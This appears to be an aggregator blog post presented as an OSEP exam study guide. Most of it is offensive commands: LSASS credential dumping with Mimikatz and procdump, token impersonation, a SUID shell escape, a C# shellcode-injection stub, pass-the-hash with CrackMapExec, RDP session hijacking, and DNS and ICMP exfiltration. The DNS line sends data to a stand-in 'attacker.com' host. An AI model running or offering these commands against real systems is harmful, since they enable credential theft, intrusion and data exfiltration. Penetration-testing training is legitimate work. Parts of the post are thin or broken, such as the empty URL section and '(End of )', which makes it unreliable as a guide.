Pwning OSEP with secrettxt: A Detailed Guide to Offensive Security’s OSEP Certification

Listen to this Post

Featured Image
Badr Eddine Jamai’s success in passing the OSEP (Offensive Security Experienced Penetration Tester) exam highlights the importance of hands-on practice and the “Try Harder” mindset. Below, we break down key techniques, commands, and strategies to help you tackle the OSEP exam.

You Should Know: Essential OSEP Exam Techniques

1. Privilege Escalation on Windows

  • Dumping LSASS for Credentials:
    Using Mimikatz 
    sekurlsa::logonpasswords 
    Procdump (non-suspicious method) 
    procdump.exe -ma lsass.exe lsass.dmp 
    
  • Abusing Token Impersonation:
    incognito.exe list_tokens -u 
    incognito.exe execute -c "DOMAIN\AdminUser" cmd.exe 
    

2. Linux Privilege Escalation

  • SUID Exploitation:
    find / -perm -4000 -type f 2>/dev/null 
    Exploit known binaries (e.g., find) 
    find . -exec /bin/sh \; -quit 
    
  • Kernel Exploits:
    uname -a 
    searchsploit "Linux Kernel 5.8" 
    

3. AV/EDR Evasion

  • Obfuscating PowerShell Payloads:
    Using Invoke-Obfuscation 
    Invoke-Obfuscation -ScriptBlock {Start-Process notepad} -Command 'Token\All\1' 
    
  • Shellcode Injection with C:
    byte[] buf = new byte[] { 0x90, 0x90, 0xCC, 0xC3 }; // Shellcode 
    IntPtr addr = VirtualAlloc(0, (uint)buf.Length, 0x1000, 0x40); 
    Marshal.Copy(buf, 0, addr, buf.Length); 
    CreateThread(0, 0, addr, 0, 0, 0); 
    

4. Lateral Movement

  • Pass-the-Hash with CrackMapExec:
    crackmapexec smb 192.168.1.0/24 -u Administrator -H NTLM_HASH --local-auth 
    
  • RDP Hijacking with Shadow Attack:
    tscon 2 /dest:rdp-tcp0 
    

5. Exfiltration Techniques

  • DNS Exfiltration:
    Encode data and exfiltrate via DNS 
    echo "secret" | xxd -p | tr -d '\n' | awk '{print "dig +short " $0 ".attacker.com"}' | sh 
    
  • ICMP Tunneling:
    sudo nping --icmp -c 1 --data-string "exfil_data" 192.168.1.100 
    

What Undercode Say

The OSEP exam tests real-world offensive security skills, requiring deep knowledge of:
– Windows/Linux Privilege Escalation
– Custom Malware Development
– AV/EDR Bypass Techniques
– Lateral Movement & Persistence

Key Tools to Master:

  • Mimikatz (Windows cred theft)
  • PowerShell Empire (C2 framework)
  • Metasploit Framework (Exploit dev)
  • Cobalt Strike (Red Team Ops)

Expected Output:

A structured, exam-ready methodology for:

  1. Initial foothold → 2. Privilege escalation → 3. Lateral movement → 4. Data exfiltration.

Prediction:

As OffSec continues updating OSEP labs, expect more .NET malware evasion and cloud-based attack scenarios in future exams.

Relevant URLs:

(End of )

References:

Reported By: Badr Eddine – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram